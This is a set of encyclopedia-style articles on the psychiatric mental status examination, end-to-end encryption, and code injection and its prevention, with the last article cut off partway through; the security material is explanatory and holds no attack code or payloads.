analyst might understand experiences or processes of which the patient is unaware, such as defense mechanisms or unconscious drives. In practice, the MSE is a blend of empathic descriptive phenomenology and empirical clinical observation. It has been argued that the term phenomenology has become corrupted in clinical psychiatry: current usage, as a set of supposedly objective descriptions of a psychiatric patient (a synonym for signs and symptoms), is incompatible with the original meaning which was concerned with comprehending a patient's subjective experience. Application The mental status examination is a core skill of qualified (mental) health personnel. It is a key part of the initial psychiatric assessment in an outpatient or psychiatric hospital setting. It is a systematic collection of data based on observation of the patient's behavior while the patient is in the clinician's view during the interview. The purpose is to obtain evidence of symptoms and signs of mental disorders, including danger to self and others, that are present at the time of the interview. Further, information on the patient's insight, judgment, and capacity for abstract reasoning is used to inform decisions about treatment strategy and the choice of an appropriate treatment setting. It is carried out in the manner of an informal enquiry, using a combination of open and closed questions, supplemented by structured tests to assess cognition. The MSE can also be considered part of the comprehensive physical examination performed by physicians and nurses although it may be performed in a cursory and abbreviated way in non-mental-health settings. 
Information is usually recorded as free-form text using the standard headings, but brief MSE checklists are available for use in emergency situations, for example, by paramedics or emergency department staff. The information obtained in the MSE is used, together with the biographical and social information of the psychiatric history, to generate a diagnosis, a psychiatric formulation and a treatment plan. Domains The mnemonic ASEPTIC can be used to remember the domains of the MSE: A - Appearance/Behavior S - Speech E - Emotion (Mood and Affect) P - Perception T - Thought Content and Process I - Insight and Judgement C - Cognition Appearance Clinicians assess the physical aspects such as the appearance of a patient, including apparent age, height, weight, and manner of dress and grooming. Colorful or bizarre clothing might suggest mania, while unkempt, dirty clothes might suggest schizophrenia or depression. If the patient appears much older than his or her chronological age this can suggest chronic poor self-care or ill-health. Clothing and accessories of a particular subculture, body modifications, or clothing not typical of the patient's gender, might give clues to personality. Observations of physical appearance might include the physical features of alcoholism or drug abuse, such as signs of malnutrition, nicotine stains, dental erosion, a rash around the mouth from inhalant abuse, or needle track marks from intravenous drug abuse. Observations can also include any odor which might suggest poor personal hygiene due to extreme self-neglect, or alcohol intoxication. Weight loss could also signify a depressive disorder, physical illness, anorexia nervosa or chronic anxiety. Attitude Attitude, also known as rapport or cooperation, refers to the patient's approach to the interview process and the quality of information obtained during the assessment. Observations of attitude include whether the patient is cooperative, hostile, open or secretive. Behavior Abnormalities of behavior, also called abnormalities of activity, include observations of specific abnormal movements, as well as more general observations of the patient's level of activity and arousal, and observations of the patient's eye contact and gait. Abnormal movements, for example choreiform, athetoid or choreoathetoid movements may indicate a neurological disorder. A tremor or dystonia may indicate a neurological condition or the side effects of antipsychotic medication. The patient may have tics (involuntary but quasi-purposeful movements or vocalizations) which may be a symptom of Tourette's syndrome. There are a range of abnormalities of movement which are typical of catatonia, such as echopraxia, catalepsy, waxy flexibility and paratonia (or gegenhalten). Stereotypies (repetitive purposeless movements such as rocking or head banging) or mannerisms (repetitive quasi-purposeful abnormal movements such as a gesture or abnormal gait) may be a feature of chronic schizophrenia or autism. More global behavioural abnormalities may be noted, such as an increase in arousal and movement (described as psychomotor agitation or hyperactivity) which might reflect mania or delirium. An inability to sit still might represent akathisia, a side effect of antipsychotic medication. Similarly, a global decrease in arousal and movement (described as psychomotor retardation, akinesia or stupor) might indicate depression or a medical condition such as Parkinson's disease, dementia or delirium. 
The examiner would also comment on eye movements (repeatedly glancing to one side can suggest that the patient is experiencing hallucinations), and the quality of eye contact (which can provide clues to the patient's emotional state). Lack of eye contact may suggest depression or autism. Mood and affect The distinction between mood and affect in the MSE is subject to some disagreement. For example, Trzepacz and Baker (1993) describe affect as "the external and dynamic manifestations of a person's internal emotional state" and mood as "a person's predominant internal state at any one time", whereas Sims (1995) refers to affect as "differentiated specific feelings" and mood as "a more prolonged state or disposition". This article will use the Trzepacz and Baker (1993) definitions, with mood regarded as a current subjective state as described by the patient, and affect as the examiner's inferences of the quality of the patient's emotional state based on objective observation. Mood is described using the patient's own words, and can also be described in summary terms such as neutral, euthymic, dysphoric, euphoric, angry, anxious or apathetic. Alexithymic individuals may be unable to describe their subjective mood state. An individual who is unable to experience any pleasure may have anhedonia. Affect is described by labelling the apparent emotion conveyed by the person's nonverbal behavior (anxious, sad etc.), and also by using the parameters of appropriateness, intensity, range, reactivity and mobility. Affect may be described as appropriate or inappropriate to the current situation, and as congruent or incongruent with their thought content. For example, someone who shows a bland affect when describing a very distressing experience would be described as showing incongruent affect, which might suggest schizophrenia. The intensity of the affect may be described as normal, blunted affect, exaggerated, flat, heightened or overly dramatic. A flat or blunted affect is associated with schizophrenia, depression or post-traumatic stress disorder; heightened affect might suggest mania, and an overly dramatic or exaggerated affect might suggest certain personality disorders. Mobility refers to the extent to which affect changes during the interview: the affect may be described as fixed, mobile, immobile, constricted/restricted or labile. The person may show a full range of affect, in other words a wide range of emotional expression during the assessment, or may be described as having restricted affect. The affect may also be described as reactive, in other words changing flexibly and appropriately with the flow of conversation, or as unreactive. A bland lack of concern for one's disability may be described as showing la belle indifférence, a feature of conversion disorder, which is historically termed "hysteria" in older texts. Speech Speech is assessed by observing the patient's spontaneous speech, and also by using structured tests of specific language functions. This heading is concerned with the production of speech rather than the content of speech, which is addressed under thought process and thought content (see below). When observing the patient's spontaneous speech, the interviewer will note and comment on paralinguistic features such as the loudness, rhythm, prosody, intonation, pitch, phonation, articulation, quantity, rate, spontaneity and latency of speech. Many acoustic features have been shown to be significantly altered in mental health disorders. 
A structured assessment of speech includes an assessment of expressive language by asking the patient to name objects, repeat short sentences, or produce as many words as possible from a certain category in a set time. Simple language tests also form part of the mini-mental state examination. In practice, the structured assessment of receptive and expressive language is often reported under Cognition (see below). Language assessment allows the recognition of medical conditions presenting with aphonia or dysarthria, neurological conditions such as stroke or dementia presenting with aphasia, and specific language disorders such as stuttering, cluttering or mutism. People with autism spectrum disorders may have abnormalities in paralinguistic and pragmatic aspects of their speech. Echolalia (repetition of another person's words) and palilalia (repetition of the subject's own words) can be heard in patients with autism, schizophrenia or Alzheimer's disease. A person with schizophrenia might use neologisms, which are made-up words that have a specific meaning to the person using them. Speech assessment also contributes to the assessment of mood: for example, people with mania or anxiety may have rapid, loud and pressured speech, whereas depressed patients will typically have a prolonged speech latency and speak in a slow, quiet and hesitant manner. Thought process Thought process in the MSE refers to the quantity, tempo (rate of flow) and form (or logical coherence) of thought. Thought process cannot be directly observed; it can only be described by the patient or inferred from the patient's speech. The form of thought is captured here: thinking may be described as goal-directed, proceeding logically from A to B (normal), or as showing formal thought disorder. A pattern of interruption or disorganization of thought processes is broadly referred to as formal thought disorder, and might be described more specifically as thought blocking, fusion, loosening of associations, tangential thinking, derailment of thought, or knight's move thinking. Thought may be described as 'circumstantial' when a patient includes a great deal of irrelevant detail and makes frequent diversions, but remains focused on the broad topic. Circumstantial thinking might be observed in anxiety disorders or certain kinds of personality disorders. Regarding the tempo of thought, some people may experience 'flight of ideas' (a manic symptom), when their thoughts are so rapid that their speech seems incoherent, although in flight of ideas a careful observer can discern a chain of poetic, syllabic, rhyming associations in the patient's speech (e.g., "I love to eat peaches, beach beaches, sand castles fall in the waves, braves are going to the finals, fee fi fo fum. Golden egg."). Alternatively, an individual may be described as having retarded or inhibited thinking, in which thoughts seem to progress slowly with few associations. Poverty of thought is a global reduction in the quantity of thought and one of the negative symptoms of schizophrenia; it can also be a feature of severe depression or dementia. A patient with dementia might also experience thought perseveration, a pattern in which a person keeps returning to the same limited set of ideas. Thought content A description of thought content would be the largest section of the MSE report. It would describe a patient's suicidal thoughts, depressed cognition, delusions, overvalued ideas, obsessions, phobias and preoccupations.
Thought content should be separated into pathological and non-pathological thought. Importantly, one should specify whether suicidal thoughts are intrusive and unwanted, with no capacity to translate into action (mens rea), or are thoughts that may lead to the act of suicide (actus reus). Abnormalities of thought content are established by exploring individuals' thoughts in an open-ended conversational manner with regard to their intensity, salience, the emotions associated with the thoughts, the extent to which the thoughts are experienced as one's own and under one's control, and the degree of belief or conviction associated with the thoughts. Delusions A delusion has three essential qualities: it can be defined as "a false, unshakeable idea or belief (1) which is out of keeping with the patient's educational, cultural and social background (2) ... held with extraordinary conviction and subjective certainty (3)", and is a core feature of psychotic disorders. For instance, allegiance to a particular political party or sports team would not in most societies be considered a delusion. The patient's delusions may be described within the SEGUE PM mnemonic as: somatic, erotomanic delusions, grandiose delusions, unspecified delusions, envious delusions (cf. delusional jealousy), persecutory or paranoid delusions, or multifactorial delusions. There are several other forms of delusion, including delusions of reference, delusional misidentification, and delusional memories (e.g., "I was a goat last year"), among others. Delusional symptoms can be reported on a continuum: full symptoms (with no insight), partial symptoms (where the patient may start questioning the delusions), and nil symptoms (where the symptoms have resolved); if delusional symptoms, or ideas that could develop into delusions, remain after complete treatment, these can be characterized as residual symptoms. Delusions can suggest several diseases such as schizophrenia, schizophreniform disorder, brief psychotic disorder, mania, depression with psychotic features, or delusional disorders. Delusional disorders can be differentiated from schizophrenia by, for example, an older age of onset and a more complete, unaffected personality: the delusion may impact only part of the patient's life and remain fairly encapsulated from the rest of the formed personality - for example, believing that a spider lives in one's hair without this belief affecting work, relationships, or education. Schizophrenia, by contrast, typically arises earlier in life, with a disintegration of personality and a failure to cope with work, relationships, or education. Other features differentiate diseases with delusions as well. Delusions may be described as mood-congruent (the delusional content in keeping with the mood), typical of manic or depressive psychosis, or mood-incongruent (delusional content not in keeping with the mood), which is more typical of schizophrenia. Delusions of control, or passivity experiences (in which the individual has the experience of the mind or body being under the influence or control of some kind of external force or agency), are typical of schizophrenia. Examples include experiences of thought withdrawal, thought insertion, thought broadcasting, and somatic passivity.
Schneiderian first rank symptoms are a set of delusions and hallucinations which have been said to be highly suggestive of a diagnosis of schizophrenia. Delusions of guilt, delusions of poverty, and nihilistic delusions (belief that one has no mind or is already dead) are typical of depressive psychosis. Overvalued ideas An overvalued idea is an emotionally charged belief that may be held with sufficient conviction to provoke strong emotion or aggression in the believer, but that fails to possess all three characteristics of delusion - most importantly, incongruity with cultural norms. Therefore, any strong, fixed, false, but culturally normative belief can be considered an "overvalued idea". Hypochondriasis is an overvalued idea that one has an illness; dysmorphophobia, that a part of one's body is abnormal; and anorexia nervosa, that one is overweight or fat. Obsessions An obsession is an "undesired, unpleasant, intrusive thought that cannot be suppressed through the patient's volition", but unlike the passivity experiences described above, it is not experienced as imposed from outside the patient's mind. Obsessions are typically intrusive thoughts of violence, injury, dirt or sex, or obsessive ruminations on intellectual themes. A person can also describe obsessional doubt, with intrusive worries about whether they have made the wrong decision or forgotten to do something, for example turn off the gas or lock the house. In obsessive-compulsive disorder, the individual experiences obsessions with or without compulsions (a sense of having to carry out certain ritualized and senseless actions against their wishes). Phobias A phobia is "a dread of an object or situation that does not in reality pose any threat", and is distinct from a delusion in that the patient is aware that the fear is irrational. A phobia is usually highly specific to certain situations and will usually be reported by the patient rather than observed by the clinician in the assessment interview. Preoccupations Preoccupations are thoughts which are not fixed, false or intrusive, but have an undue prominence in the person's mind. Clinically significant preoccupations would include thoughts of suicide, homicidal thoughts, suspicious or fearful beliefs associated with certain personality disorders, depressive beliefs (for example that one is unloved or a failure), or the cognitive distortions of anxiety and depression. Suicidal thoughts The MSE contributes to clinical risk assessment by including a thorough exploration of any suicidal or hostile thought content. Assessment of suicide risk includes detailed questioning about the nature of the person's suicidal thoughts, beliefs about death, reasons for living, and whether the person has made any specific plans to end his or her life. The most important questions to ask are: do you have suicidal feelings now; have you ever attempted suicide (past attempts are highly correlated with future attempts); do you have plans to commit suicide in the future; and do you have any deadlines by which you may commit suicide (e.g., a numerological calculation, a doomsday belief, Mother's Day, an anniversary, Christmas)? Perceptions A perception in this context is any sensory experience, and the three broad types of perceptual disturbance are hallucinations, pseudohallucinations and illusions. A hallucination is defined as a sensory perception in the absence of any external stimulus, and is experienced in external or objective space (i.e. experienced by the subject as real).
An illusion is defined as a false sensory perception in the presence of an external stimulus, in other words a distortion of a sensory experience, and may be recognized as such by the subject. A pseudohallucination is experienced in internal or subjective space (for example as "voices in my head") and is regarded as akin to fantasy. Other sensory abnormalities include a distortion of the patient's sense of time, for example déjà vu, or a distortion of the sense of self (depersonalization) or sense of reality (derealization). Hallucinations can occur in any of the five senses, although auditory and visual hallucinations are encountered more frequently than tactile (touch), olfactory (smell) or gustatory (taste) hallucinations. Auditory hallucinations are typical of psychoses: third-person hallucinations (i.e. voices talking about the patient) and hearing one's thoughts spoken aloud (gedankenlautwerden or écho de la pensée) are among the Schneiderian first rank symptoms indicative of schizophrenia, whereas second-person hallucinations (voices talking to the patient), threatening or insulting the patient or telling them to commit suicide, may be a feature of psychotic depression or schizophrenia. Visual hallucinations are generally suggestive of organic conditions such as epilepsy, drug intoxication or drug withdrawal. Many of the visual effects of hallucinogenic drugs are more correctly described as visual illusions or visual pseudohallucinations, as they are distortions of sensory experiences and are not experienced as existing in objective reality. Auditory pseudohallucinations are suggestive of dissociative disorders. Déjà vu, derealization and depersonalization are associated with temporal lobe epilepsy and dissociative disorders. Cognition This section of the MSE covers the patient's level of alertness, orientation, attention, memory, visuospatial functioning, language functions and executive functions. Unlike other sections of the MSE, use is made of structured tests in addition to unstructured observation. Alertness is a global observation of level of consciousness, i.e. awareness of and responsiveness to the environment, and might be described as alert, clouded, drowsy, or stuporous. Orientation is assessed by asking the patient where he or she is (for example what building, town and state) and what time it is (time, day, date). Attention and concentration are assessed by several tests, most commonly the serial sevens test: subtracting 7 from 100, then 7 from each successive answer, five times (93, 86, 79, 72, 65). Alternatives include spelling a five-letter word backwards, saying the months or days of the week in reverse order, serial threes (subtracting 3 from 20, five times), and testing digit span. Memory is assessed in terms of immediate registration (repeating a set of words), short-term memory (recalling the set of words after an interval, or recalling a short paragraph), and long-term memory (recollection of well known historical or geographical facts). Visuospatial functioning can be assessed by the ability to copy a diagram, draw a clock face, or draw a map of the consulting room. Language is assessed through the ability to name objects, repeat phrases, and by observing the individual's spontaneous speech and response to instructions. Executive functioning can be screened for by asking the "similarities" questions ("what do x and y have in common?") and by means of a verbal fluency task (e.g. "list as many words as you can starting with the letter F, in one minute").
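Purely as an illustration of the expected answer sequences for the serial-subtraction tests mentioned above (this snippet is not part of any standard MSE protocol), a trivial Python sketch:

```python
# Generate the expected answers for serial subtraction tests.
def serial_subtraction(start: int, step: int, count: int) -> list[int]:
    """Return `count` successive differences, starting from `start`."""
    answers = []
    for _ in range(count):
        start -= step
        answers.append(start)
    return answers

print(serial_subtraction(100, 7, 5))  # serial sevens: [93, 86, 79, 72, 65]
print(serial_subtraction(20, 3, 5))   # serial threes: [17, 14, 11, 8, 5]
```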
The mini-mental state examination is a simple structured cognitive assessment which is in widespread use as a component of the MSE. Mild impairment of attention and concentration may occur in any mental illness where people are anxious and distractible (including psychotic states), but more extensive cognitive abnormalities are likely to indicate a gross disturbance of brain functioning such as delirium, dementia or intoxication. Specific language abnormalities may be associated with pathology in Wernicke's area or Broca's area of the brain. In Korsakoff's syndrome there is dramatic memory impairment with relative preservation of other cognitive functions. Visuospatial or constructional abnormalities here may be associated with parietal lobe pathology, and abnormalities in executive functioning tests may indicate frontal lobe pathology. This kind of brief cognitive testing is regarded as a screening process only, and any abnormalities are more carefully assessed using formal neuropsychological testing. The MSE may include a brief neuropsychiatric examination in some situations. Frontal lobe pathology is suggested if the person cannot repetitively execute a motor sequence (e.g. "paper-scissors-rock"). The posterior columns are assessed by the person's ability to feel the vibrations of a tuning fork on the wrists and ankles. The parietal lobe can be assessed by the person's ability to identify objects by touch alone and with eyes closed. A cerebellar disorder may be present if the person cannot stand with arms extended, feet touching and eyes closed without swaying (Romberg's sign); if there is a tremor when the person reaches for an object; or if he or she is unable to touch a fixed point, close the eyes and touch the same point again. Pathology in the basal ganglia may be indicated by rigidity and resistance to movement of the limbs, and by the presence of characteristic involuntary movements. A lesion in the posterior fossa can be detected by asking the patient to roll his or her eyes upwards (Parinaud's syndrome). Focal neurological signs such as these might reflect the effects of some prescribed psychiatric medications, chronic drug or alcohol use, head injuries, tumors or other brain disorders. Insight The person's understanding of his or her mental illness is evaluated by exploring his or her explanatory account of the problem, and understanding of the treatment options. In this context, insight can be said to have three components: recognition that one has a mental illness, compliance with treatment, and the ability to re-label unusual mental events (such as delusions and hallucinations) as pathological. As insight is on a continuum, the clinician should not describe it as simply present or absent, but should report the patient's explanatory account descriptively. Impaired insight is characteristic of psychosis and dementia, and is an important consideration in treatment planning and in assessing the capacity to consent to treatment. Anosognosia is the clinical term for the condition in which the patient is unaware of their neurological deficit or psychiatric condition. Judgment Judgment refers to the patient's capacity to make sound, reasoned and responsible decisions. One should frame judgement to the functions or domains that are normal versus impaired (e.g., poor judgement is isolated to petty theft, able to function in relationships, work, academics). 
Traditionally, the MSE included the use of standard hypothetical questions such as "what would you do if you found a stamped, addressed envelope lying in the street?"; however, contemporary practice is to inquire about how the patient has responded or would respond to real-life challenges and contingencies. Assessment would take into account the individual's executive system capacity in terms of impulsiveness, social cognition, self-awareness and planning ability. Impaired judgment is not specific to any diagnosis but may be a prominent feature of disorders affecting the frontal lobe of the brain. If a person's judgment is impaired due to mental illness, there might be implications for the person's safety or the safety of others. Cultural considerations There are potential problems when the MSE is applied in a cross-cultural context, when the clinician and patient are from different cultural backgrounds. For example, the patient's culture might have different norms for appearance, behavior and display of emotions. Culturally normative spiritual and religious beliefs need to be distinguished from delusions and hallucinations; the two may seem similar to an observer who does not understand that they have different roots. Cognitive assessment must also take the patient's language and educational background into account. A clinician's racial bias is another potential confounder. When working with Aboriginal people, consultation with community cultural leaders or with experienced clinicians can help ensure that cultural phenomena are properly considered when completing an MSE with Aboriginal patients, and can highlight issues to consider from a cross-cultural perspective. Children There are particular challenges in carrying out an MSE with young children and others with limited language, such as people with intellectual impairment. The examiner would explore and clarify the individual's use of words to describe mood, thought content or perceptions, as words may be used idiosyncratically, with a different meaning from that assumed by the examiner. In this group, tools such as play materials, puppets, art materials or diagrams (for instance with multiple choices of facial expressions depicting emotions) may be used to facilitate recall and explanation of experiences. See also Diagnostic classification and rating scales used in psychiatry Diagnostic and Statistical Manual of Mental Disorders DSM-IV Codes Glossary of psychiatry Self-administered Gerocognitive Examination (SAGE) Footnotes References Adams, Yolonda, et al. (2010) Principles of Practice in Mental Health Assessment with Aboriginal Australians. Further reading External links University of Utah Medical School: Video clips demonstrating cognitive assessment Principles of Practice in Mental Health Assessment with Aboriginal Australians Psychiatric assessment Clinical psychology Medical diagnosis Medical mnemonics
Mental status examination
[ "Biology" ]
6,131
[ "Behavioural sciences", "Behavior", "Clinical psychology" ]
1,065,362
https://en.wikipedia.org/wiki/End-to-end%20encryption
End-to-end encryption (E2EE) is a method of implementing a secure communication system in which only the communicating users can read the messages. No one else, including the system provider, telecom providers, Internet providers or malicious actors, can access the cryptographic keys needed to read or send messages. End-to-end encryption prevents data from being read or secretly modified, except by the true sender and intended recipients. Frequently, the messages are relayed from the sender to the recipients by a service provider. However, messages are encrypted by the sender and no third party, including the service provider, has the means to decrypt them. The recipients retrieve the encrypted messages and decrypt them independently. Since third parties cannot decrypt the data being communicated or stored, services that provide end-to-end encryption are better at protecting user data when they are affected by data breaches. Such services are also unable to share user data with government authorities, domestic or international. In 2022, the UK's Information Commissioner's Office, the government body responsible for enforcing online data standards, stated that opposition to E2EE was misinformed and the debate too unbalanced, with too little focus on benefits, since E2EE helped keep children safe online and law enforcement access to stored data on servers was "not the only way" to find abusers. E2EE and privacy In many non-E2EE messaging systems, including email and many chat networks, messages pass through intermediaries and are stored by a third-party service provider, from which they are retrieved by the recipient. Even if the messages are encrypted, they are only encrypted 'in transit', and are thus accessible by the service provider. Server-side disk encryption is also distinct from E2EE because it does not prevent the service provider from viewing the information, as they have the encryption keys and can simply decrypt it. The lack of end-to-end encryption can allow service providers to easily provide search and other features, or to scan for illegal and unacceptable content. However, it also means that content can be read by anyone who has access to the data stored by the service provider, by design or via a backdoor. This can be a concern in many cases where privacy is important, such as in governmental and military communications, financial transactions, and when sensitive information such as health and biometric data are sent. If this content were shared without E2EE, a malicious actor or adversarial government could obtain it through unauthorized access or subpoenas targeted at the service provider. E2EE alone does not guarantee privacy or security. For example, data may be held unencrypted on the user's own device, or be accessible via their own app, if their login is compromised. Etymology The term "end-to-end encryption" originally only meant that the communication is never decrypted during its transport from the sender to the receiver. For example, around 2003, E2EE was proposed as an additional layer of encryption for GSM or TETRA, in addition to the existing radio encryption protecting the communication between the mobile device and the network infrastructure. This was standardized by the SFPG for TETRA. Note that in TETRA E2EE, the keys are generated by a Key Management Centre (KMC) or a Key Management Facility (KMF), not by the communicating users.
Later, around 2014, the meaning of "end-to-end encryption" started to evolve when WhatsApp encrypted a portion of its network, requiring not only that the communication stay encrypted during transport, but also that the service provider be unable to decrypt it. This new meaning is now the widely accepted one. Modern usage As of 2016, typical server-based communications systems do not include end-to-end encryption. These systems can only guarantee the protection of communications between clients and servers, meaning that users have to trust the third parties who are running the servers with the sensitive content. End-to-end encryption is regarded as safer because it reduces the number of parties who might be able to interfere with or break the encryption. In the case of instant messaging, users may use a third-party client or plugin to implement an end-to-end encryption scheme over an otherwise non-E2EE protocol. Some non-E2EE systems, such as Lavabit and Hushmail, have described themselves as offering "end-to-end" encryption when they did not. Other systems, such as Telegram and Google Allo, have been criticized for not enabling end-to-end encryption by default. Telegram did not enable end-to-end encryption by default on VoIP calls while users were using the desktop version of the software, but that problem was fixed quickly. However, as of 2020, Telegram still features no end-to-end encryption by default, no end-to-end encryption for group chats, and no end-to-end encryption for its desktop clients. In 2022, Facebook Messenger came under scrutiny because the messages between a mother and daughter in Nebraska were used to seek criminal charges in an abortion-related case against both of them. The daughter told the police that she had a miscarriage and tried to search for the date of her miscarriage in her Messenger app. Police suspected there could be more information within the messages and obtained and served a warrant against Facebook to gain access. The messages allegedly mentioned the mother obtaining abortion pills for her daughter and then burning the evidence. Facebook expanded default end-to-end encryption in the Messenger app just days later. Writing for Wired, Albert Fox Cahn criticized Messenger's approach to end-to-end encryption, which was not enabled by default, required opt-in for each conversation, and split the message thread into two chats which were easy for the user to confuse. Some encrypted backup and file sharing services provide client-side encryption. This type of encryption is not referred to as end-to-end encryption because only one end has the ability to decrypt the data. However, the term "end-to-end encryption" is sometimes incorrectly used to describe client-side encryption. Challenges Man-in-the-middle attacks End-to-end encryption ensures that data is transferred securely between endpoints. But, rather than try to break the encryption, an eavesdropper may impersonate a message recipient (during key exchange or by substituting their public key for the recipient's), so that messages are encrypted with a key known to the attacker. After decrypting the message, the snoop can then encrypt it with a key that they share with the actual recipient, or their public key in the case of asymmetric systems, and send the message on again to avoid detection. This is known as a man-in-the-middle attack (MITM). Authentication Most end-to-end encryption protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, one could rely on certification authorities or a web of trust.
An alternative technique is to generate cryptographic hashes (fingerprints) based on the communicating users’ public keys or shared secret keys. The parties compare their fingerprints using an outside (out-of-band) communication channel that guarantees integrity and authenticity of communication (but not necessarily secrecy), before starting their conversation. If the fingerprints match, there is, in theory, no man in the middle. When displayed for human inspection, fingerprints usually use some form of binary-to-text encoding. These strings are then formatted into groups of characters for readability. Some clients instead display a natural language representation of the fingerprint. As the approach consists of a one-to-one mapping between fingerprint blocks and words, there is no loss in entropy. The protocol may choose to display words in the user's native (system) language. This can, however, make cross-language comparisons prone to errors. In order to improve localization, some protocols have chosen to display fingerprints as base-10 strings instead of more error-prone hexadecimal or natural-language strings. An example of a base-10 fingerprint (called a safety number in Signal and a security code in WhatsApp) would be: 37345 35585 86758 07668 05805 48714 98975 19432 47272 72741 60915 64451 Other applications such as Telegram, instead, encode fingerprints using emojis. Modern messaging applications can also display fingerprints as QR codes that users can scan off each other's devices. Endpoint security The end-to-end encryption paradigm does not directly address risks at the communications endpoints themselves. Each user's computer can still be hacked to steal their cryptographic key (to create a MITM attack) or simply read the recipients’ decrypted messages, both in real time and from log files. Even the most perfectly encrypted communication pipe is only as secure as the mailbox on the other end. Major attempts to increase endpoint security have been to isolate key generation, storage, and cryptographic operations on a smart card such as Google's Project Vault. However, since plaintext input and output are still visible to the host system, malware can monitor conversations in real time. A more robust approach is to isolate all sensitive data to a fully air-gapped computer. PGP has been recommended by experts for this purpose. However, as Bruce Schneier points out, Stuxnet, developed by the US and Israel, successfully jumped the air gap and reached the network of Iran's Natanz nuclear plant. To deal with key exfiltration by malware, one approach is to split the trusted computing base across two unidirectionally connected computers, which prevents either the insertion of malware or the exfiltration of sensitive data by malware that has been inserted. Backdoors A backdoor is usually a secret method of bypassing normal authentication or encryption in a computer system, a product, an embedded device, etc. Companies may also willingly or unwillingly introduce backdoors to their software that help subvert key negotiation or bypass encryption altogether. In 2013, information leaked by Edward Snowden showed that Skype had a backdoor which allowed Microsoft to hand over its users' messages to the NSA despite the fact that those messages were officially end-to-end encrypted. Following terrorist attacks in San Bernardino in 2015 and Pensacola in 2019, the FBI requested backdoors to Apple's iPhone software.
The company, however, refused to create a backdoor for the government, citing concern that such a tool could pose a risk to its consumers’ privacy. Compliance and regulatory requirements for content inspection While E2EE can offer privacy benefits that make it desirable in consumer-grade services, many businesses have to balance these benefits with their regulatory requirements. For example, many organizations are subject to mandates that require them to be able to decrypt any communication between their employees or between their employees and third parties. This might be needed for archival purposes, for inspection by Data Loss Prevention (DLP) systems, for litigation-related eDiscovery, or for detection of malware and other threats in the data streams. For this reason, some enterprise-focused communications and information protection systems might implement encryption in a way that ensures all transmissions are encrypted but terminates the encryption at their internal systems (on-premises or cloud-based), so that they retain access to the information for inspection and processing. See also Comparison of instant messaging protocols – a table overview of VoIP clients that offer end-to-end encryption Diffie–Hellman key exchange – method of negotiating secret keys for the communicating users without sharing them with observers, such as the communication system provider End-to-end auditable voting systems Point-to-point encryption Crypto Wars References Further reading Cryptography Telecommunications Secure communication Internet privacy Computer networks engineering
End-to-end encryption
[ "Mathematics", "Technology", "Engineering" ]
2,437
[ "Information and communications technology", "Cybersecurity engineering", "Cryptography", "Computer engineering", "Applied mathematics", "Computer networks engineering", "Telecommunications" ]
1,065,470
https://en.wikipedia.org/wiki/Code%20injection
Code injection is a computer security exploit where a program fails to correctly process external data, such as user input, causing it to interpret the data as executable commands. An attacker using this method "injects" code into the program while it is running. Successful exploitation of a code injection vulnerability can result in data breaches, access to restricted or critical computer systems, and the spread of malware. Code injection vulnerabilities occur when an application sends untrusted data to an interpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers, operating system commands, Simple Mail Transfer Protocol (SMTP) headers, and other program arguments. Injection flaws can be identified through source code examination, static analysis, or dynamic testing methods such as fuzzing. There are numerous types of code injection vulnerabilities, but most are errors in interpretation—they treat benign user input as code or fail to distinguish input from system commands. Interpretation errors can also arise outside of computer science, as in the comedy routine "Who's on First?". Code injection can be used maliciously for many purposes, including: Arbitrarily modifying values in a database through SQL injection; the impact of this can range from website defacement to serious compromise of sensitive data. For more information, see Arbitrary code execution. Installing malware or executing malevolent code on a server by injecting server scripting code (such as PHP). Privilege escalation, either to superuser permissions on UNIX by exploiting shell injection vulnerabilities in a binary file, or to Local System privileges on Microsoft Windows by exploiting a service within Windows. Attacking web users with Hyper Text Markup Language (HTML) or Cross-Site Scripting (XSS) injection. Code injections that target the Internet of Things could also lead to severe consequences such as data breaches and service disruption. Code injection can occur in any program that runs with an interpreter. Exploiting such flaws is often trivial, which is one of the primary reasons server software is kept isolated from users. A simple way to observe code injection first-hand is to use a browser's developer tools. Code injection vulnerabilities are recorded by the National Institute of Standards and Technology (NIST) in the National Vulnerability Database (NVD) as CWE-94. Code injection peaked in 2008 at 5.66% of all recorded vulnerabilities. Benign and unintentional use Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent. Code injection could, for example: Introduce a useful new column that did not appear in the original design of a search results page. Offer a new way to filter, order, or group data by using a field not exposed in the default functions of the original design. Add functionality like connecting to online resources in an offline program. Override a function, making calls redirect to another implementation. This can be done with the dynamic linker in Linux; the sketch below shows an analogous runtime override.
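As a minimal illustration of the benign-override idea, the following Python sketch redirects calls to an existing function at runtime. It is an analogy to dynamic-linker interposition, not the Linux mechanism itself; the logging wrapper is hypothetical.

import math

original_sqrt = math.sqrt

def logging_sqrt(x):
    # New implementation: add logging, then delegate to the original.
    print(f"sqrt called with {x}")
    return original_sqrt(x)

math.sqrt = logging_sqrt  # calls to math.sqrt are now redirected

print(math.sqrt(2))  # logs the call, then prints 1.4142135623730951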
Some users may unsuspectingly perform code injection because the input they provided to a program was not considered by those who originally developed the system. For example: What the user may consider valid input may contain token characters or strings that have been reserved by the developer to have special meaning (such as the ampersand or quotation marks). The user may submit a malformed file as input that is handled properly in one application but is toxic to the receiving system. Another benign use of code injection is the discovery of injection flaws in order to find and fix vulnerabilities. This is known as a penetration test. Preventing Code Injection To prevent code injection problems, developers can use secure input and output handling strategies, such as: Using an application programming interface (API) that, if used properly, is secure against all input characters. Parameterized queries move user data out of a string that would otherwise be interpreted as a command (see the sketch at the end of this section). Additionally, the Criteria API and similar APIs move away from the concept of command strings to be created and interpreted. Enforcing language separation via a static type system. Validating or "sanitizing" input, such as whitelisting known good values. This can be done on the client side, which is prone to modification by malicious users, or on the server side, which is more secure. Encoding input or escaping dangerous characters. For instance, in PHP, using the htmlspecialchars() function to escape special characters for safe output of text in HTML and the mysqli::real_escape_string() function to isolate data which will be included in an SQL request can protect against SQL injection. Encoding output, which can be used to prevent XSS attacks against website visitors. Using the HttpOnly flag for HTTP cookies. When this flag is set, it does not allow client-side script interaction with cookies, thereby preventing certain XSS attacks. Modular shell disassociation from the kernel. Regarding SQL injection, one can use parameterized queries, stored procedures, whitelist input validation, and other approaches to help mitigate the risk of an attack. Using object-relational mapping can further help prevent users from directly manipulating SQL queries. The solutions described above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injections of user code on a user-operated machine, which often results in privilege elevation attacks. Some approaches that are used to detect and 